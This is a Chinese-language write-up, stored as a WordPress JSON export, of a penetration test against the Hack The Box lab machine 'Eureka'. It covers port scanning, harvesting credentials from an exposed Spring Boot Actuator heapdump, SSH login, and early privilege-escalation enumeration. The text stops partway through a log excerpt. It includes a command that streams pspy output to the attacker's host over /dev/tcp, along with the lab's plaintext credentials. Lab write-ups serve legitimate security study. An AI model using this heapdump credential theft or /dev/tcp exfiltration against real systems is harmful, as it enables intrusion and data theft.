{"id":259,"date":"2025-05-02T13:59:14","date_gmt":"2025-05-02T05:59:14","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=259"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"259","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/05\/02\/259\/","title":{"rendered":"HTB\u9776\u673a Eureka \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.11.66<\/code><strong>\uff08\u5b58\u5728\u591a\u4e2aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.103.58 (10.129.103.58) 56(84) bytes of data.\n64 bytes from 10.129.103.58: icmp_seq=1 ttl=63 time=367 ms\n64 bytes from 10.129.103.58: icmp_seq=2 ttl=63 time=400 ms\n64 bytes from 10.129.103.58: icmp_seq=3 ttl=63 time=412 ms\n64 bytes from 10.129.103.58: icmp_seq=4 ttl=63 time=332 ms\n\n--- 10.129.103.58 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 331.549\/377.715\/411.705\/31.248 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u901a\u4fe1\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Apr 27 07:34:32 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.103.58\nNmap scan report for 10.129.103.58\nHost is up (0.31s latency).\nAll 65535 scanned ports on 10.129.103.58 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Apr 27 07:35:18 2025 -- 1 IP address (1 host up) scanned in 45.06 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Apr 27 07:37:19 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.103.58\nWarning: 10.129.103.58 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.58\nHost is up (0.31s latency).\nNot shown: 64856 closed tcp ports (conn-refused), 676 filtered tcp ports (no-response)\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)\n|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)\n|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)\n80\/tcp   open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/furni.htb\/\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n8761\/tcp open  http    Apache Tomcat (language: en)\n|_http-title: Site doesn't have a title.\n| http-auth: \n| HTTP\/1.1 401 x0D\n|_  Basic realm=Realm\nDevice type: general purpose\nRunning: Linux 5.X\nOS CPE: cpe:\/o:linux:linux_kernel:5.0\nOS details: Linux 5.0, Linux 5.0 - 5.14\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   354.00 ms 10.10.14.1\n2   354.17 ms 10.129.103.58\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Apr 27 07:38:34 2025 -- 1 IP address (1 host up) scanned in 74.98 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Apr 27 07:40:06 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.103.58\nWarning: 10.129.103.58 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.58\nHost is up (0.33s latency).\nAll 65535 scanned ports on 10.129.103.58 are in ignored states.\nNot shown: 65289 open|filtered udp ports (no-response), 246 closed udp ports (port-unreach)\n\n# Nmap done at Sun Apr 27 07:44:09 2025 -- 1 IP address (1 host up) scanned in 242.91 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Ubuntu Linux<\/code>\uff0c\u5f00\u653e\u4e86<code>Nginx<\/code>\u548c<code>Apache Tomcat<\/code>\u4e24\u4e2a<code>Web<\/code>\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u7591\u4f3c\u4e3a<code>furni.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u7aef\u53e3<code>Banner<\/code>\uff1a<\/p>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/eureka]\n\u2514\u2500# nc -nv 10.129.103.58 22                                     \n(UNKNOWN) [10.129.103.58] 22 (ssh) open\nSSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12<\/code><\/pre>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/furni.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745746218507-1f57a6fb-420f-45d5-96f2-6db4114f5461.png\" alt=\"\" \/><\/p>\n<p>\u901a\u8fc7\u67e5\u770b\u4e3b\u9875\uff0c\u53d1\u73b0\u8be5\u7f51\u7ad9\u4e3a\u4e00\u4e2a\u5728\u7ebf\u5bb6\u5177\u8ba2\u8d2d\u7cfb\u7edf\u3002<\/p>\n<p>\u9996\u5148\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Sun Apr 27 18:11:45 2025 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/furni.htb -x 400,403,404 -t 60 -e jsp,js,html,txt,zip,tar.gz,xml,json,pdf,pcap\n\n200    14KB  http:\/\/furni.htb\/about\n200     2KB  http:\/\/furni.htb\/actuator\n200    20B   http:\/\/furni.htb\/actuator\/caches\n200     2B   http:\/\/furni.htb\/actuator\/info\n200   467B   http:\/\/furni.htb\/actuator\/features\n405   114B   http:\/\/furni.htb\/actuator\/refresh\n200    54B   http:\/\/furni.htb\/actuator\/scheduledtasks\n200     3KB  http:\/\/furni.htb\/actuator\/metrics\n200    15B   http:\/\/furni.htb\/actuator\/health\n200     6KB  http:\/\/furni.htb\/actuator\/env\n200    35KB  http:\/\/furni.htb\/actuator\/mappings\n200    36KB  http:\/\/furni.htb\/actuator\/configprops\n200    99KB  http:\/\/furni.htb\/actuator\/loggers\n200   198KB  http:\/\/furni.htb\/actuator\/beans\n200   180KB  http:\/\/furni.htb\/actuator\/conditions\n200   478KB  http:\/\/furni.htb\/actuator\/threaddump\n200    76MB  http:\/\/furni.htb\/actuator\/heapdump\n200    13KB  http:\/\/furni.htb\/blog\n302     0B   http:\/\/furni.htb\/cart    -&gt; REDIRECTS TO: http:\/\/furni.htb\/login\n302     0B   http:\/\/furni.htb\/checkout    -&gt; REDIRECTS TO: http:\/\/furni.htb\/login\n302     0B   http:\/\/furni.htb\/comment    -&gt; REDIRECTS TO: http:\/\/furni.htb\/login\n200    10KB  http:\/\/furni.htb\/contact\n500    73B   http:\/\/furni.htb\/error\n200     2KB  http:\/\/furni.htb\/login\n200     1KB  http:\/\/furni.htb\/logout\n200     9KB  http:\/\/furni.htb\/register\n200    14KB  http:\/\/furni.htb\/services\n200    12KB  http:\/\/furni.htb\/shop<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u7f51\u7ad9\u5b58\u5728<code>API<\/code>\u7aef\u70b9<code>\/actuator<\/code>\uff0c\u5c1d\u8bd5\u76f4\u63a5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745796696352-db94330e-2b2c-4f21-af77-ba443ce2f917.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u63a5\u53e3\u4e3a<code>Java SpringBoot<\/code>\u5f00\u53d1\u6846\u67b6\u7684\u5e94\u7528\u5065\u5eb7\u72b6\u6001\u76d1\u63a7\u63a5\u53e3\u3002\u5c1d\u8bd5\u8bbf\u95ee<code>\/actuator\/env<\/code>\u63a5\u53e3\u83b7\u53d6<code>SpringBoot<\/code>\u73af\u5883\u53d8\u91cf\u4fe1\u606f\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745796907440-04d58efd-1a03-445a-b878-d7e9078e2fd9.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\u53d1\u73b0\u9776\u673a<\/strong><code>Web<\/code><strong>\u670d\u52a1\u5b58\u5728<\/strong><code>SpringBoot Actuator<\/code><strong>\u63a5\u53e3\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>SpringBoot Actuator\u672a\u6388\u6743\u8bbf\u95ee\u5229\u7528<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u5df2\u7ecf\u6210\u529f\u53d1\u73b0\u4e86<code>Web<\/code>\u670d\u52a1\u7684<code>SpringBoot Actuator API<\/code>\u63a5\u53e3\u5b58\u5728\u672a\u6388\u6743\u8bbf\u95ee\u914d\u7f6e\u95ee\u9898\u3002\u73b0\u5728\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\uff0c\u9010\u4e2a\u67e5\u770b<code>\/actuator\/env<\/code>\u7aef\u70b9\u7684<code>JSON<\/code>\u914d\u7f6e\u952e\u540d\uff0c\u5728\u73af\u5883\u53d8\u91cf\u5185\u53d1\u73b0\u4e86<code>SpringBoot<\/code>\u6570\u636e\u5e93\u8fde\u63a5\u914d\u7f6e<code>spring.datasource.username<\/code>\u548c<code>spring.datasource.password<\/code>\uff1a<\/p>\n<pre><code class=\"language-json\">{\n      \"name\": \"Config resource 'file [\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties]' via location '\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties'\",\n      \"properties\": {\n        \"spring.application.name\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 1:25\"\n        },\n        \"spring.session.store-type\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 2:27\"\n        },\n        \"spring.cloud.inetutils.ignoredInterfaces\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 3:42\"\n        },\n        \"spring.cloud.client.hostname\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 4:30\"\n        },\n        \"eureka.client.service-url.defaultZone\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 6:40\"\n        },\n        \"eureka.instance.hostname\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 7:26\"\n        },\n        \"eureka.instance.prefer-ip-address\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 8:35\"\n        },\n        \"spring.jpa.hibernate.ddl-auto\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 10:31\"\n        },\n        \"spring.datasource.url\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 11:23\"\n        },\n        \"spring.datasource.username\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 12:28\"\n        },\n        \"spring.datasource.password\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 13:28\"\n        },\n        \"spring.datasource.driver-class-name\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 14:37\"\n        },\n        \"spring.jpa.properties.hibernate.format_sql\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 15:44\"\n        },\n        \"server.address\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 17:16\"\n        },\n        \"server.port\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 18:13\"\n        },\n        \"server.forward-headers-strategy\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 20:33\"\n        },\n        \"management.endpoints.web.exposure.include\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 22:43\"\n        }\n      }\n    }<\/code><\/pre>\n<p>\u540c\u65f6\u8fd8\u53d1\u73b0<code>JavaWeb<\/code>\u7684\u914d\u7f6e\u6587\u4ef6\u4e3a\uff1a<code>\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties<\/code>\u3002<\/p>\n<p>\u67e5\u770b\u5b8c<code>\/actuator\/env<\/code>\u7aef\u70b9\u7684\u54cd\u5e94\u5185\u5bb9\u540e\uff0c\u76f4\u63a5\u4f7f\u7528<code>wget<\/code>\u8bbf\u95ee<code>\/actuator\/heapdump<\/code>\u7aef\u70b9\uff0c\u4e0b\u8f7d\u5f53\u524d<code>JVM<\/code>\u865a\u62df\u673a\u7684\u5185\u5b58\u5feb\u7167\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">wget http:\/\/furni.htb\/actuator\/heapdump -O springboot_heapdump<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5b8c\u6bd5\u540e\uff0c\u4f7f\u7528<code>Eclipse Memory Analyzer<\/code>\u5de5\u5177\u6253\u5f00\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745802397597-ed184a02-46a0-4e15-a900-5bf8e24d9b3e.png\" alt=\"\" \/><\/p>\n<h2>JVM\u5185\u5b58\u5feb\u7167\u4e2d\u83b7\u53d6\u767b\u5f55\u51ed\u636e<\/h2>\n<p>\u6210\u529f\u6253\u5f00\u5185\u5b58\u5feb\u7167\u540e\uff0c\u70b9\u51fb\u53f3\u4fa7\u7a97\u4f53\u9876\u90e8\u7684<code>OQL<\/code>\u67e5\u8be2\u7f16\u8f91\u5668\u6309\u94ae\uff0c\u6253\u5f00\u67e5\u8be2\u9875\u9762\u3002\u7531\u4e8e\u4e4b\u524d\u5728<code>\/actuator\/env<\/code>\u73af\u5883\u53d8\u91cf\u63a5\u53e3\u5185\u53d1\u73b0\u4e86\u5b58\u50a8<code>SpringBoot<\/code>\u6570\u636e\u5e93\u8fde\u63a5\u51ed\u636e\u7684\u952e\u540d\u5206\u522b\u4e3a<code>spring.datasource.username<\/code>\u548c<code>spring.datasource.password<\/code>\uff0c\u76f4\u63a5\u7f16\u5199<code>OQL<\/code>\u67e5\u8be2\u8bed\u53e5\uff0c\u4ece<code>java.util.LinkedHashMap$Entry<\/code>\u5b9e\u4f8b\u4e2d\u67e5\u8be2\u540d\u79f0\u5185\u5305\u542b<code>spring.datasource<\/code>\u952e\u7684\u503c\uff1a<\/p>\n<pre><code class=\"language-plsql\">select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains(&amp;quot;spring.datasource&amp;quot;))<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803207817-7459c543-d576-4aa4-9178-e9894836536d.png\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u6210\u529f\u53d1\u73b0<code>spring.datasource.username<\/code>\u548c<code>spring.datasource.password<\/code>\u4e24\u4e2a\u952e\u540d\uff0c\u76f4\u63a5\u70b9\u51fb\u5c55\u5f00\u67e5\u770b\u952e\u503c\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803462171-3caf27ec-5e84-42d0-8a9b-798c108ad32c.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803490118-f22ad33a-3c45-48a9-9d22-cc29fb7bbad7.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>oscar190<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>0sc@r190_S0l!dP@sswd<\/code><\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u4e0a\u8ff0\u51ed\u636e\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh oscar190@10.129.23.73<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803823187-340074e8-c6b6-47ec-bac3-1560ff7fe0cb.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u767b\u5f55\u7cfb\u7edf\u540e\uff0c\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u3002\u53d1\u73b0\u9776\u673a<code>Web<\/code>\u670d\u52a1\u7a0b\u5e8f\u76ee\u5f55\u5728<code>\/var\/www\/web<\/code>\u4e0b\uff0c\u4e14\u5b58\u5728\u591a\u4e2a\u7ad9\u70b9\u76ee\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746142766207-9a564990-3889-405c-a4a7-740320b4d11a.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u7ffb\u770b<code>\/var\/www\/web\/Furni<\/code>\u76ee\u5f55\uff0c\u5728<code>\/var\/www\/web\/Furni\/src\/main\/resources<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0<code>Web<\/code>\u670d\u52a1\u914d\u7f6e\u6587\u4ef6<code>application.properties<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746142973332-9156e9e8-b7c3-435f-ba83-6f48a09d6e57.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u67e5\u770b\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-plain\">spring.application.name=Furni\nspring.session.store-type=jdbc\nspring.cloud.inetutils.ignoredInterfaces=enp0s.*\nspring.cloud.client.hostname=localhost\n#Eureka\neureka.client.service-url.defaultZone= http:\/\/EurekaSrvr:0scarPWDisTheB3st@localhost:8761\/eureka\/\neureka.instance.hostname=localhost\neureka.instance.prefer-ip-address=false\n#Mysql\nspring.jpa.hibernate.ddl-auto=none\nspring.datasource.url=jdbc:mysql:\/\/localhost:3306\/Furni_WebApp_DB\nspring.datasource.username=oscar190\nspring.datasource.password=0sc@r190_S0l!dP@sswd\nspring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver\nspring.jpa.properties.hibernate.format_sql=true\n#tomcat\nserver.address=localhost\nserver.port=8082\n# Enable proxy support\nserver.forward-headers-strategy=native\n#A\nmanagement.endpoints.web.exposure.include=*<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u7591\u4f3c\u9776\u673a<code>8761<\/code>\u7aef\u53e3<code>HTTP Basic<\/code>\u8ba4\u8bc1\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>EurekaSrvr<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>0scarPWDisTheB3st<\/code><\/li>\n<\/ul>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u5728<code>\/opt<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u811a\u672c<code>log_analyse.sh<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746143435717-19b8b76b-d734-44bd-9ccb-07bbcd4786d6.png\" alt=\"\" \/><\/p>\n<h2>\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u6536\u96c6<\/h2>\n<p><strong>\u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144178455-7b023817-9870-47a8-a44a-2864b3970afc.png\" alt=\"\" \/><\/p>\n<p><strong>\u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144198798-f9b0fe66-47a0-4d70-8eb3-b4625053d1c0.png\" alt=\"\" \/><\/p>\n<p><strong>\u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144204782-2a2887de-7ed8-4b10-aeb7-36a3a65cd26f.png\" alt=\"\" \/><\/p>\n<p><strong>\u73af\u5883\u53d8\u91cf<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144212291-4a8f90c6-3f6a-4f74-bf6e-0c7f28bcbfeb.png\" alt=\"\" \/><\/p>\n<p><strong>\u7528\u6237\u4fe1\u606f<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144226759-f29b0cbf-9c1f-4ae9-87d6-e9e51fed4115.png\" alt=\"\" \/><\/p>\n<p><strong>\u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144338559-fe73e148-4d1f-43bd-b417-bfc087b80938.png\" alt=\"\" \/><\/p>\n<p><strong>\u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144350554-a182eb28-dd58-4d1d-9961-689a1b244a72.png\" alt=\"\" \/><\/p>\n<p><strong>\u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144353263-1a4abecb-bba9-4695-8a83-fb49e63b5db1.png\" alt=\"\" \/><\/p>\n<p><strong>\u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144359170-c196b51c-e732-4f02-81d5-9d4c2b91f9ef.png\" alt=\"\" \/><\/p>\n<p><strong>Nginx\u7ad9\u70b9\u914d\u7f6e<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144391050-4ef03922-8a6d-4967-a713-ce7c7855c7b1.png\" alt=\"\" \/><\/p>\n<p>\u5206\u6790<code>LinPeas<\/code>\u7684\u679a\u4e3e\u7ed3\u679c\uff0c\u53d1\u73b0\u9776\u673a\u7684<code>80<\/code>\u7aef\u53e3\u5b9e\u9645\u88ab\u6307\u5411\u4e86\u672c\u5730\u7684<code>8080<\/code>\u7aef\u53e3\uff0c\u8fd8\u53d1\u73b0\u9776\u673a\u5b58\u5728\u540d\u4e3a<code>miranda-wise<\/code>\u7684\u7528\u6237\u3002<\/p>\n<p>\u5c1d\u8bd5\u4e0a\u4f20<code>pspy32<\/code>\u5de5\u5177\u8fdb\u884c\u7cfb\u7edf\u8fdb\u7a0b\u76d1\u63a7\uff1a<\/p>\n<pre><code class=\"language-shell\">scp -P 22222 megumin@10.10.14.2:\/usr\/share\/pspy\/pspy32 .\/pspy32\nchmod +x pspy32\n.\/pspy32 &gt;&amp; \/dev\/tcp\/10.10.14.2\/53 0&gt;&amp;1 &amp;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746145272720-65463f3b-9154-4934-94cf-8ecc78666480.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a\u5728\u4ee5<code>root<\/code>\u8eab\u4efd\u5b9a\u65f6\u8fd0\u884c<code>curl<\/code>\u7a0b\u5e8f\u8bbf\u95ee<code>Furni<\/code>\u7ad9\u70b9\u767b\u5f55\u63a5\u53e3\uff0c\u7591\u4f3c\u8fdb\u884c\u767b\u5f55\u64cd\u4f5c\uff1b\u540c\u65f6\u8fd8\u5728\u4e0d\u65ad\u8c03\u7528<code>\/opt\/log_analyse.sh<\/code>\u811a\u672c\u7a0b\u5e8f\uff0c\u5bf9<code>\/var\/www\/web\/user-management-service\/log\/application.log<\/code>\u548c<code>\/var\/www\/web\/cloud-gateway\/log\/application.log<\/code>\u4e24\u4efd<code>Web<\/code>\u5e94\u7528\u65e5\u5fd7\u8fdb\u884c\u6570\u636e\u6c47\u603b\u5206\u6790\u3002<\/p>\n<p>\u67e5\u770b<code>user-management-service<\/code>\u9879\u76ee\u4e0b\u7684\u65e5\u5fd7\u6587\u4ef6\uff0c\u53d1\u73b0\u4e86\u5927\u91cf<code>miranda<\/code>\u7528\u6237\u7684\u6210\u529f\u767b\u5f55\u8bb0\u5f55\uff1a<\/p>\n<pre><code class=\"language-plain\">2025-04-09T11:36:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:37:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:38:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:39:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:40:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:41:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in 